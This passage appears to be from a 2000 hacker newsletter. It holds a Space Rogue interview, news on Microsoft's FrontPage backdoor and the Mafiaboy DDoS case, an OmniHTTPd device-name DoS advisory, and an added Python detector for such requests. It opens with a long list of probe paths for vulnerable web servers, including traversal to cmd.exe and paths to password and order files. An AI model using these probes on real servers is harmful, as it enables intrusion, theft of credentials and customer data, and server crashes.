/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin/fpcount.exe
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-win/uploader.exe
/cgi-shl/win-c-sample.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/scripts/no-such-file.pl
/scripts/counter.exe
/scripts/uploadn.asp
/scripts/convert.bas
/scripts/iisadmin/ism.dll
/scripts/tools/getdrvrs.exe
/scripts/tools/dsnform.exe
/scripts/samples/search/webhits.exe
/scripts/../../cmd.exe
/scripts/webbbs.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/cpshost.dll
/scripts/tools/getdrvs.exe
/scripts/pu3.pl
/scripts/proxy/w3proxy.dll
/WebShop/templates/cc.txt
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/config/orders.txt
/config/import.txt
/config/checks.txt
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/fileexist.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/iissamples/query.asp
/iissamples/exair/search/advsearch.asp
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/pw/storemgr.pw
/config/mountain.cfg
/orders/mountain.cfg
/quikstore.cfg
/PDG_Cart/shopper.conf
/search97.vts
/carbo.dll
/msadc/Samples/SELECTOR/showcode.asp
/adsamples/config/site.csc
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/doc
/doc Boa?? 8-)
/.html/............./config.sys
/ssi/envout.bat
/~root
/server%20logfile
/....../autoexec.bat
/perl/files.pl
/lpt
/AdvWorks/equipment/catalog_type.asp
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/admin.php3
/code.php3
/bb-dnbd/bb-hist.sh
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/secure/.htaccess
/secure/.wwwacl
/WebSTAR
/msadc/msadcs.dll
/?PageServices
/_AuthChangeUrl?
/........./autoexec.bat
/.html/............/autoexec.bat
/......../
/eatme.idc
/eatme.ida
/eatme.pl
/eatme.idq
/eatme.idw
/default.asp
/default.asp::$DATA
/default.asp.
/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
/samples/
/photoads/cgi-bin/env.cgi
/photoads/cgi-bin/
/photoads/
/session/admnlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/cfappman/index.cfm
/samples/search/queryhit.htm
/msadc/msadcs.dll
/publisher/|publisher
/PSUser/PSCOErrPage.htm
../../boot.ini
../..
/aux
/status
/log

@HWA

06.0 Project Gamma interviews SpaceRogue of HNN
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Space Rogue

Date Published: March 12, 2000
Date Conducted: March 11, 2000
Interview Conducted By: WHiTe VaMPiRe
Interview Conducted With: Space Rogue

Space Rogue is the editor of the Hacker News Network, a member of L0pht Heavy Industries (Now @Stake) -- he also previously maintained the Whacked Mac Archives, one of the largest Macintosh hacking-related sites on the Internet.

Questions are colored and Space Rogue's answers are indented.

How did you first get involved with computing?

    A door to door Osborne Salesperson came to my house. Showed us an Osborne One. While our family could not afford it ($2,000+), that is where I started. I convinced him to come back several times on the premise of maybe we will buy it. In those few hours I learned a lot.

What would you consider your first computer?

    Commodore 64.

What projects were you involved with before the L0pht?

    Nothing anyone would know about.

How did you get involved with the L0pht?

    I knew most of the other founders for years via local bulletin board systems.

What are your feelings on the merger of the L0pht and @Stake?

    A good thing in general, it allows time and resources to be devoted to important projects that would never have been possible before.

What initially brought you to create the Hacker News Network?

    I was sharing URLs with a small group of people and decided that it would be better to put them on the web and share them with a larger audience.

Many have noticed that after the L0pht / @Stake merger the commercial content was removed from HNN. How else will the merger affect HNN?

    @Stake is committed to vendor neutrality which is why all advertisements were removed. You will also notice the removal of the HNN Store and no more T-shirt sales. In the future you can expect even more changes including even the name of the site as it gets integrated into the @Stake corporate web presence.

What do you have planned for HNN's future?

    HNN's future is pretty much out of my hands at the moment.

Do you have any comments on the media's interpretation of "hackers," "crackers," and the related communities?

    This is an ongoing battle; sometimes I think we are winning, and other times I think we have failed miserably. There are some journalists out there who actually 'get it' but many many others need to be educated.

Do you think the media has at all improved with its coverage of 'hacking' related topics in the past few years?

    Well they have given it more coverage, not sure if that qualifies as an improvement though. This is especially evident during fast moving critical stories such as the recent DDoS attacks. Some news outlets got it right but many more got it wrong.

How do you think they could improve their coverage and cut down the FUD (Fear, Uncertainty, and Doubt)?

    Education. Unfortunately many reporters have little to no understanding of technology.

Why was the name of Project BootyCall changed to TBA?

    No comment.

What is your opinion on Web site defacements?

    Most are childish and serve no purpose. You would think that people who are taking such an immense risk of going to jail would have something better to say than 'Props to my peeps.'

The Hacker News Network is accessible at http://www.hackernews.com/. Space Rogue can be contacted via spacerog@l0pht.com.

@HWA

07.0 MS Engineers plant secret anti-Netscape password
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by MerXor

MS admits planting secret password

Microsoft engineers placed a password in server software that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide.

By Ted Bridis, WSJ Interactive Edition
April 14, 2000 4:34 AM PT

Microsoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide.

The manager of Microsoft's security-response center, Steve Lipner, acknowledged the online-security risk in an interview Thursday and described such a backdoor password as "absolutely against our policy" and a firing offense for the as-yet-unidentified employees.

The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site.

Microsoft (Nasdaq: MSFT) urged customers to delete the computer file--called "dvwssr.dll"--containing the offending code. The file is installed on the company's Internet-server software with Frontpage 98 extensions.

While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files, which could in turn provide a road map to such things as customer credit-card numbers, said security experts who discovered the password.

Two security experts discovered the rogue computer code -- part of which was the denigrating comment "Netscape engineers are weenies!" -- buried within the 3-year-old piece of software. It was apparently written by a Microsoft employee near the peak of the hard-fought wars between Netscape Communications Corp. and Microsoft over their versions of Internet-browser software. Netscape later was acquired by America Online Inc.

One of the experts who helped identify the file is a professional security consultant known widely among the Internet underground as "Rain Forest Puppy." Despite his unusual moniker, he is highly regarded by experts and helped publicize a serious flaw in Microsoft's Internet-server software last summer that put hundreds of high-profile Web sites at risk of intrusion.

Almost every Web-hosting provider

Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider."

"It's a serious flaw," Cooper said. "Chances are, you're going to find some major sites that still have it enabled."

Lipner of Microsoft said the company will warn the nation's largest Web-site providers directly.

In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained that the affected code threatened to "improve a hacker's experience."

Experts said the risk was greatest at commercial Internet-hosting providers, which maintain hundreds or thousands of separate Web sites for different organizations.

Lipner said the problem doesn't affect Internet servers running Windows 2000 or the latest version of its server extensions included in Frontpage 2000.

The digital gaffe initially was discovered by a Europe-based employee of ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells e-commerce technology. The company declined to comment because of its coming stock sale.

The other expert, Rain Forest Puppy, said he was tipped off to the code by a ClientLogic employee.

When asked about the hidden insult Thursday, Jon Mittelhauser, one of Netscape's original engineers, called it "classic engineer rivalry."

@HWA

08.0 b0f:Omni HTTPD Pro v2.06 for Win9x and NT DoS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Main site/home page is http://b0f.freeBSD.lublin.pl/ and is run by Venglin of b0f. (NOTE: www.b0f.com is the old site and that site may be phased out in the future. - Ed)

-=-

_____________________________________________________________________
b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 3

Advisory Name: Omni HTTPD Pro v2.06 for Win9x and NT DoS
Date: 12/4/00
Application: Omni HTTPD Pro v2.06 (probably others?)
Vendor: Omnicron Technologies Corporation
WWW: http://www.omnicron.ab.ca
Severity: Any user can simply crash remote server with installed OmniHTTP daemon
Author: sirius ( sirius@linuxfan.com )
Homepage: www.b0f.com

* Overview

Quote from Omnicron Technologies Web site:

"OmniHTTPd is a powerful all-purpose industry compliant web server built specifically for the Windows 95/98/NT4 platform. In addition to Standard CGI support, the server sports advanced features such as Keep-Alive connections, table auto-indexing and server-side includes. For maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many users agree that OmniHTTPd is the fastest and most compact web server available for the Windows platform ..."

* The Problem

It is possible to crash OmniHttpD Pro. v2.06 (maybe other versions) because it parses the path strings to call some FAT32/VFAT routines in the kernel, which makes your system unstable and useless until next reboot. If you request the following directories: /com1, /com2, /com3, /aux, /lpt1, /lpt2, /clock$, /config$, /nul (and maybe others but not /con) the web server accepts the connection. E.g. if you request the /com3 directory on a remote server and it has a modem device installed on com. port 3, it will crash the connection of the remote server and you will have to reboot the machine. If you have a device installed on com. ports and the remote user requests a directory whose name matches the name of one device driver (e.g. /aux), it will crash that device ... if you succeed you will get error 403 : forbidden error.

* Vulnerable Versions

- OmniHttpd version 2.06 Pro under Win98, NT not tested
- maybe other earlier versions

* Fix

Unknown for now, I mailed Omnicron Technologies ... they will probably fix this bug in next version.

* Additional information:

Well, I played with this thing and went to SecurityFocus.com to check for this bug and I found securax security advisory 01 with some general information about this bug, so if you need more information read that advisory at:

http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-1&
thread=4.2.0.58.20000306111151.00992c60@urc1.cc.kuleuven.ac.be

copyright © 1999-2000 sirius , buffer0verfl0w security
www.b0f.com

@HWA

09.0 Judge bans Mitnick from taking part in tech conference
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://deseretnews.com/dn/view/0,1249,160008642,00.html?

Federal judge bans convicted hacker from taking part in tech conference

A federal judge Monday banned convicted computer hacker Kevin Mitnick from taking part in a technology conference in Salt Lake City Wednesday.

Mitnick, who gained notoriety for his hacking exploits and spent several years in a federal prison in Lompoc, Calif., won't be sitting on a computer security panel discussion at the Utah Information Technologies Association conference at the Salt Palace Convention Center.

The judge kiboshed the appearance because Mitnick's prison release agreement prohibits him from "consulting or advising" on the topic of computer-related activity.

Monday, Mitnick did an extended interview promoting the panel discussion on KSL's Doug Wright Show, where he answered callers' questions about computer security and told the story of his hacking exploits. He hacked for fun, he said, and never made any money from it.

Richard Nelson, president of UITA, said Mitnick's public relations representative had indicated that Mitnick had permission to appear from the U.S. probation office in California. A few days ago, the organization learned he might not be able to leave California.

Conference organizers are in the process of arranging a replacement for Mitnick on the cyber-security panel. They are planning on bringing in a senior staffer from a large company that deals with cyber security.

Nelson said he's sorry Mitnick can't participate. "He's eager to talk and disappointed he can't come. If you listened (to him on the radio show), he recognizes he made serious mistakes and he wanted to go forward.

"We're not trying to promote his career, but if he can help information technology companies in Utah and decision makers dealing with security issues determine what level of risk they want to take, that's good. There will always be risk, but you can reduce it by taking security measures."

The UITA conference, "Net Trends 2000: The Digital Revolution" takes place Wednesday and Thursday.
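
Referring back to the Omni HTTPD Pro advisory in section 08.0: the following is an added example, not code from the advisory, from b0f or from Omnicron. It shows a Python check that a request handler or a log review could use to catch paths naming DOS devices. The function names, the extra device names (COM4-9, LPT3-9, PRN) and the sample log lines are assumptions constructed for illustration.

```python
"""Flag HTTP request paths that name reserved DOS devices (added example)."""
import re
from urllib.parse import unquote

# Names taken from the advisory: com1-3, aux, lpt1-2, clock$, config$, nul
# and con. COM4-9, LPT3-9 and PRN are added here as an assumption so the
# check covers the whole legacy device set, not only the names it tested.
RESERVED = (
    {"con", "prn", "aux", "nul", "clock$", "config$"}
    | {f"com{i}" for i in range(1, 10)}
    | {f"lpt{i}" for i in range(1, 10)}
)

# Common Log Format: client ident user [time] "METHOD path proto" status
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def reserved_component(raw_path):
    """Return the first path component that resolves to a device, else None.

    An exact match on "/aux" is not enough: the device name is matched
    case-insensitively in any directory, and an extension, a trailing dot
    or a trailing colon does not stop it ("AUX.txt", "nul.", "com1:").
    """
    path = unquote(raw_path.split("?", 1)[0])   # drop query, undo %xx once
    for part in re.split(r"[/\\]+", path):
        stem = re.split(r"[.:]", part.strip(" ."), maxsplit=1)[0]
        if stem.rstrip(" ").lower() in RESERVED:
            return part
    return None


def scan_log(lines):
    """Return (client, path, component, status) for each flagged request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue                            # not a CLF request line
        client, _method, path, status = m.groups()
        part = reserved_component(path)
        if part is not None:
            hits.append((client, path, part, int(status)))
    return hits


# Constructed sample access log (documentation address ranges, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2000:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [12/Apr/2000:10:01:05 +0000] "GET /com3 HTTP/1.0" 403 210',
    '198.51.100.7 - - [12/Apr/2000:10:01:06 +0000] "GET /cgi-bin/AUX.txt?x=1 HTTP/1.0" 403 210',
    '192.0.2.10 - - [12/Apr/2000:10:01:09 +0000] "GET /images/console.gif HTTP/1.0" 200 5120',
    '198.51.100.7 - - [12/Apr/2000:10:01:11 +0000] "GET /docs/nul%2Ehtml HTTP/1.0" 404 180',
]

if __name__ == "__main__":
    for client, path, part, status in scan_log(SAMPLE_LOG):
        print(f"{client} requested {path!r} (device component {part!r}, status {status})")
```

In a request handler the same function would run on the path before any filesystem call and answer with an error instead of opening the name. The 403 status the advisory mentions makes a useful secondary filter when reviewing old logs.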
@HWA 10.0 The continuing saga of MAFIABOY king lemur of DDoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.usatoday.com/usatonline/20000421/2187297s.htm Hacker's friends may be suspects in cyberattacks By Kevin Johnson USA TODAY WASHINGTON -- Authorities investigating the February attacks on some of the most popular Internet sites are focusing on three close friends of the 15-year-old Canadian boy who was charged earlier this week, a senior U.S. law enforcement official said Thursday. The three friends of the Montreal computer hacker known as ''Mafiaboy'' are among several potential suspects identified by authorities in the cyberassaults that temporarily shut down the Web sites of CNN, Yahoo, Amazon.com and several other media and commercial giants. Beyond Montreal, authorities are examining the activities of a small group of hackers thought to be based in Israel. Officials there say the group has been involved in various online financial crimes, some involving stolen credit card numbers. The group is believed to be part of a larger circle of computer users, including Mafiaboy, who have spent time in an Internet chat room called TNT. The chat room is accessible only by password. Investigators also are trying to determine whether Dennis Moran, a 17-year-old New Hampshire hacker known online as ''Coolio,'' was involved in the attacks in February. Moran, who authorities say has boasted of being involved in the attacks, was charged last month in an attack on a Web site run by the Los Angeles Police Department. The unidentified Montreal teenager known as Mafiaboy has been charged only in two attacks against CNN.com, which was shut down for 3 1/2 hours Feb. 8 after it was overloaded with requests. Mafiaboy claimed credit in chat rooms for similar assaults on sites run by Yahoo and Buy.com. Officials believe Mafiaboy may have been capable of directing all the assaults but doubt that he did. 
Analysts familiar with the assaults say the software used to wall off access to the CNN Web site on Feb. 8 was different and less sophisticated than that used to paralyze Yahoo on Feb. 7.

Michael Lyle, who runs a software security firm in Palo Alto, Calif., said the attack on CNN involved software commonly found on Internet sites for hackers. ''I literally could show you how to do it in three or four hours,'' he said.

The goal is to flood Internet sites with tens of thousands of requests, disguising the source of the assault by routing the requests through high-capacity computers elsewhere. The tactic overloads the targeted Web sites, causing electronic paralysis.

Investigators say Mafiaboy orchestrated the attack on CNN.com through computers at the University of California-Santa Barbara.

A Canadian law enforcement official said that because of Mafiaboy's age, it is unlikely he would be sent to an adult prison if convicted of ''mischief to data.''

If prosecuted and convicted as an adult, the teenager could face up to 20 years in prison. But in Canada's juvenile system, he faces a maximum of two years in a youth detention center if convicted.

@HWA

10.1 Mafiaboy reaction: "yeah right"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.wired.com/news/print/0,1294,35785,00.html

Mafiaboy Reaction: 'Yeah, Right'
by Leander Kahney

2:20 p.m. Apr. 19, 2000 PDT

The hacking community is skeptical that the Canadian Royal Mounted Police have nabbed the perpetrator of February’s highly publicized denial of service attacks.

Following news that the Mounties charged a Montreal juvenile in the attacks, hackers are demanding evidence that the 15-year-old known by the alias "Mafiaboy" was indeed involved.

"I’m highly skeptical," said B.K. DeLong, a member of Attrition.org, an Internet security group that monitors and archives website cracks and defacement. "I don't think they've found the person who did the attacks.
I think law enforcement is stalling the press and public to keep them off their backs while they find the real person," DeLong said.

DeLong said his skepticism was based on what appears to be a paucity of evidence linking "Mafiaboy" to the attacks.

According to initial reports, the RCMP found computer logs and the transcript of an online chat group that led them to file the charges against the teen, whose real identity is shielded by Canadian law.

DeLong said law enforcement had already blundered in the case with the arrest of Coolio, a.k.a. Dennis Moran, who was detained by New Hampshire police in March in relation to the attacks, but later was charged with the unrelated defacement of a Los Angeles Police Department anti-drug site.

DeLong also noted that denial of service attacks are notoriously difficult to investigate and there has been a suspiciously long delay between the attacks and the charges.

"I think they should show some definite evidence how they got this guy," said Scully, editor of Cipherwar, a technology and politics site. "Chat list logs are not enough."

Scully said that law enforcement agencies have a poor record of finding and charging cyber-criminals, as evidenced by the four years notorious computer hacker Kevin Mitnick was incarcerated awaiting trial.

This is the second time "Mafiaboy" has been linked to the attacks.

Mafiaboy -- whoever that may be -- first was tabbed as a potential perpetrator of the attacks by an Internet security firm about a week after they occurred.

Even then, hackers expressed their doubts Mafiaboy was involved.

"I seriously doubt that this guy is an actual suspect," Space Rogue, editor of the Hackers News Network, told Wired News at the time. "Maybe he did it, but the information I have doesn't point to that at all."
10.2 Mafiaboy's dad gets busted for conspiracy to DDoS a business associate's head
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I kid you not, I suppose his mum will be up on solicitation charges next... -Ed

http://www.wired.com/news/print/0,1294,35836,00.html

Like Mafia Son, Like Mafia Dad
Wired News Report

10:45 a.m. Apr. 21, 2000 PDT

Mafiaboy didn't fall far from the tree, it seems.

Turns out the Canadian police tapped into some rather incriminating telephone calls placed by the 15-year-old cracker's dad, who allegedly took out a contract on a business colleague.

See also:
Hot On the Trail of 'Mafiaboy'
Reno: 'We Must Punish Mafiaboy'
Mafiaboy Reaction: 'Yeah, Right'

Lieutenant Lenny Lechman said Mafiaboy's 45-year-old father was arrested last week and charged with conspiring to commit bodily harm.

"We felt that before somebody gets hurt really badly, we had to intervene as quickly as possible," Lechman said.

Mafiaboy was charged earlier this week with two counts of mischief for a Feb. 8 denial-of-service attack on CNN.com. He was fingered as a suspect back in February by Michael Lyle, chief technical officer of Internet-security firm Recourse Technologies Inc.

Mafiaboy's dad, whose real name is John Calce, was released on bail Monday. Mafiaboy himself has also been released, with a Kevin Mitnickian-like stipulation that he stay away from computers.

Canadian police said they are still analyzing data found on the alleged cracker's seized computers.

@HWA

10.3 On another mafiaboy note, a new site has popped up on Geocities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.geocities.com/freemafiaboy/

gullible adj 1: easily deceived or tricked ; synonymous with Michael Lyle

Michael Lyle is considered to be a computer security expert.... He is cofounder and Chief Technology Officer of Recourse Technologies in sunny Palo Alto California, which sells anti-hacker software programs.
Also, he used to work for Exodus Communications, which experienced an embarrassing hacker break-in while he was employed there, and admits that he himself used to be a hacker. He goes by the nickname Icee on IRC. He told ABC he had communicated with Mafiaboy on IRC, and the 15-year-old said he had attacked not only CNN.com but also E+Trade. There is now definitive proof that he was NOT talking with whom he believed was mafiaboy.

Mafiaboy is a 15 year old Canadian. He was arrested on April 15 and charged with two counts of mischief to data for the attack that jammed up to 1,200 CNN-hosted Web sites for four hours Feb. 8.

This website documents the extreme carelessness Michael Lyle showed in his "investigation" of the DDoS attacks that recently plagued CNN, Yahoo, Amazon, and E-trade. He is quoted in multiple news articles saying that he had conversations on IRC with "mafiaboy", who he claims admitted to the attacks on CNN and E-trade. The methods he used to ascertain that this was the real "mafiaboy" or if "mafiaboy" actually launched any of these attacks were extremely inefficient. This website contains concrete proof (from 2600.com) that on at least one occasion he was not talking to who he believed was mafiaboy. He later cited information from that same conversation in an interview with ABC. The General Public should not be constantly under these misconceptions the media is providing.

Upon reading the IRC logs from 2600.com you will certainly question how gullible Michael Lyle is. Maybe he was just too focused on the fact of catching the perpetrator of these "hacker" crimes, so he could claim fame to himself and his company Recourse Technologies.... and get rich in the process.

Is Mafiaboy real or a creation of the media? 04/20/00
This is the link to the IRC logs which show Michael's conversation with whom he believed was mafiaboy. Icee is Michael Lyle, while "[mafiaboy]" is someone from 2600 staff posing as him.
This is an extremely hilarious conversation when you take into account the fact that this is all a joke played on the "security expert" Michael Lyle.

Below are various news stories I found online about mafiaboy.

Probe of Hacker Nets a Second Suspect: His Father 04/21/2000 NEW INFO IN THIS ARTICLE
The Challenge of Fighting Cybercrime ....04.20.00
Janet Reno licks chops over Mafiaboy arrest 04/20/2000 5:11pm
Canadian Teen Charged in Web Blitz Thursday, April 20, 2000
Canada Arrests 'Mafiaboy' Hacker, Aged 15 Apr 19 2000 7:49PM ET
Canadian Arrest Made in February Web Attacks 04/19/2000 10:10:00 ET
Reno Says 'Mafiaboy' Hacker Must Face Punishment Apr 19 2000 11:04AM ET
‘Mafiaboy’ Suspected Feb. 16 This is pretty old.. but has some of the initial info.

I have absolutely no idea whether or not mafiaboy is the same person as the Canadian teen arrested or if mafiaboy is even the individual responsible for the crimes. I have never conversed with anyone named mafiaboy and have no idea who he is.

Comments can be e-mailed to Taelon@mail.com

@HWA

10.4 Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html

Probe of Hacker Nets a Second Suspect: His Father

By Steven Pearlstein and David A. Vise
Washington Post Staff Writers
Friday, April 21, 2000; A01

ILE-BIZARD, Quebec -- There may be more to the computer moniker "Mafiaboy" than first believed.

Montreal police said today that they moved in on the 15-year-old hacker last weekend after learning from wiretaps that his father had taken out a contract to harm or frighten a business associate and that the attack was imminent.

They had wiretapped the boy's house shortly after U.S. and Canadian investigators identified that someone who lived there had launched a disabling computer attack that had shut down CNN's Web site and possibly other big sites in February.

"We didn't think we could wait any longer," a Canadian police official said.

Mafiaboy had bragged in online chats and to friends that he had taken down CNN.com, Amazon.com, Buy.com, eBay and E-Trade, but they didn't believe him. Federal law enforcement officials in Canada and the United States took note, however, following up on tips and tracing the electronic path that led to Mafiaboy's neighborhood in the West Island section of Montreal, sources familiar with the probe said.

The wiretaps were intended to pick up evidence against the boy and leads about possible collaborators. Inadvertently, however, a police official said they also picked up phone conversations from the boy's 45-year-old father, president of a transportation company, as he conspired with a hit man about harming or scaring a business associate.

Police moved in on both father and son at 3 a.m. Saturday at their home, charging the son with two counts of "mischief" with data and the father with two counts of conspiracy to cause bodily harm.

The father, John Calce, was released Monday on $2,000 (U.S.) bail and ordered not to get within 300 yards of the house or office of the man he had allegedly targeted.

The boy was also released from detention on the condition that he not associate with his three closest friends. Canadian law enforcement officials said yesterday they wanted to prevent Mafiaboy from using computers belonging to his friends and also did not want him to attempt to silence his friends, who could be witnesses against him in the case.

The Royal Canadian Mounted Police, which is handling the investigation of Mafiaboy's computer hacking, indicated today it expects further charges will be brought against the boy once they have had a chance to review all of the evidence and the weeks of wiretaps on the house. U.S. and Canadian authorities also expect to charge others who may or may not have collaborated with the Montreal boy, whom police described as a somewhat amateurish hacker.
There are no indications that the boy is cooperating with the investigation, and his attorney said yesterday that he intends to shift the focus from his client to the Web sites that should have better protected themselves against computer vandalism.

"We can already foresee a long, complex and very technical trial which will certainly shed light on how a 15-year-old could have done what he is accused of, to a multinational corporation which almost certainly could have been expected to be equipped with the most sophisticated and up-to-date security systems," said lawyer Yan Romanowski.

The Riverdale High School student with the Mafiaboy screen name struggled in classes and was transferred to Riverdale this year after being suspended repeatedly from another school closer to his home, classmates and law enforcement officials confirmed today. They said he excelled in one course: computers.

Known as a computer whiz but a constant discipline problem--he had been suspended from Riverdale twice this year--he frequently talked back to his English and math teachers, banging his desk and rarely showing up for class with books and completed homework, according to friends and classmates who gathered for hot dogs today at La Belle Province, one block from the campus.

The friends, all of whom declined to give their names, said Mafiaboy had been bragging about his hacking exploits for the past several weeks.

"I didn't believe him," said one. "He was a bit of a showoff."

"He had a real attitude," said another as he waited for the No. 205 bus after school. "He wanted to graduate someday, but he knew he had problems."

Mafiaboy was described by his classmates as bright, engaging, outgoing and loyal to his friends. He hung out generally with the tough guys and was known to smoke cigarettes. In dress, he favors baggy pants, a loose-fitting yellow jacket and Nike T-shirts and shoes.

"He likes to chill the girls after school," said one student having a cigarette at "The Pit," the unofficial smoking area just outside the school fence, at lunch time. Although he is said to have had one or two girlfriends over the years, he does not have one now, classmates said.

The 5-foot-11 youth played guard in a Saturday afternoon basketball league on a team called the Brookwood Jazz.

He may have more time to shoot hoops in the weeks ahead, since conditions of his release forbid him from using the Internet, entering a business with computers or going into a computer store. He is only allowed to use computers at school under the strict supervision of teachers and even then, is not allowed to access the Internet. Canadian police are examining the computers seized from the boy's house in the Saturday morning raid.

Although he was in biology class yesterday when police announced details of his weekend arrest, he was reportedly not in school today, on the eve of a five-day Easter recess in Montreal-area schools.

Riverdale is an ethnically and economically mixed high school in a largely English-speaking neighborhood, with about 1,200 students. More than half its students go on to community college or university. Students are required to wear uniforms.

Mafiaboy lives about a 12-minute drive from the school in a new development of large brick and stone mini-mansions arrayed around the new St. Raphael Golf Course. Yesterday, a "for sale" sign was visible on the lawn of the family's sea-foam-green brick house, as it has been for four months. The asking price was recently reduced below $250,000 (U.S.). There is a paved basketball court on the side.

A teenage boy who answered the door at the house late this afternoon simply handed the visitor a lawyer's business card.

Neighbors out in their own yards told of a family that kept largely to itself. Mafiaboy's father is divorced, and the boy and his brother were living with the father and their stepmother.
One neighbor said the father liked to sit out on the front stoop in his sweat suit and make loud telephone calls on his cellular telephone using noticeably crude language.

U.S. and Canadian authorities have been monitoring the home where Mafiaboy lives for weeks but the authorities said they did not move to make arrests in the case until they were certain whose fingers were on the keyboard.

Mafiaboy could be sentenced to a term of up to two years in juvenile detention for disrupting CNN's Web site, Canadian officials said yesterday, although they added that sentences for such crimes typically are stiffer in the United States than in Canada.

"Young hackers, talking mostly now about 14- to 15-year-olds up to 22- or 23-year-olds, sometimes do not realize the damages they could make with their actions," said Yves Roussell, officer in charge of the Montreal commercial crime section of the RCMP.

Roussell said U.S. and Canadian politicians need to do a better job of coordinating the legal penalties and sanctions for cross-border crimes, including computer hacking, and said additional resources are needed to fight hacking. He said the RCMP is studying the computers and data taken from the home.

"There are literally tons of documentation and information to analyze and scrutinize and devise and from there we will pursue our criminal investigation," Roussell said. "We are still investigating the case."

Vise reported from Washington.

© 2000 The Washington Post Company

@HWA

10.5 Mafiaboy:The Challenge of Fighting Cybercrime (Reno)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cipherwar.com/news/00/reno_2.htm

The Challenge of Fighting Cybercrime ....04.20.00

If you haven't heard, the Canadian police have arrested a 15 year-old boy in connection with the February DDoS attacks. Canadian law protects the suspect's privacy by prohibiting the release of Mafiaboy's true identity. This fact alone is a refreshing change from the American way of doing things.
Arrest someone on the most pathetic evidence you can obtain, like chat room logs, and release their identity, ruin their lives, and then release them because there is not enough evidence.

Janet Reno, among other inadequate criminal investigators, claims that the arrest proves that they can track down cybercriminals. Reno forgets that an individual is innocent until proven guilty, therefore they have not proven they can track down cybercriminals. And how long has it taken them to even find a 15 year-old boy to pin it on?

Mafiaboy was arrested in Canada, and this is probably a good thing for him since the US Justice Department would probably have hung him out to dry as the big bad hacker, that he is probably not. Just to show how ridiculous Janet Reno is, below is an excerpt, uncut, of an address by Reno in February shortly after the DDoS attacks. The entire "statement" can be found here: http://www.cybercrime.gov/ag0216.htm.

The Challenge of Fighting Cybercrime

The recent attacks highlight some of the challenges we face in combating cybercrime. The challenges come in many forms: technical problems in tracing criminals operating online; resource issues facing federal, state, and local law enforcement in being able to undertake online criminal investigations and obtain evidence stored in computers; and legal deficiencies caused by changes in technology. I will discuss each of these briefly.

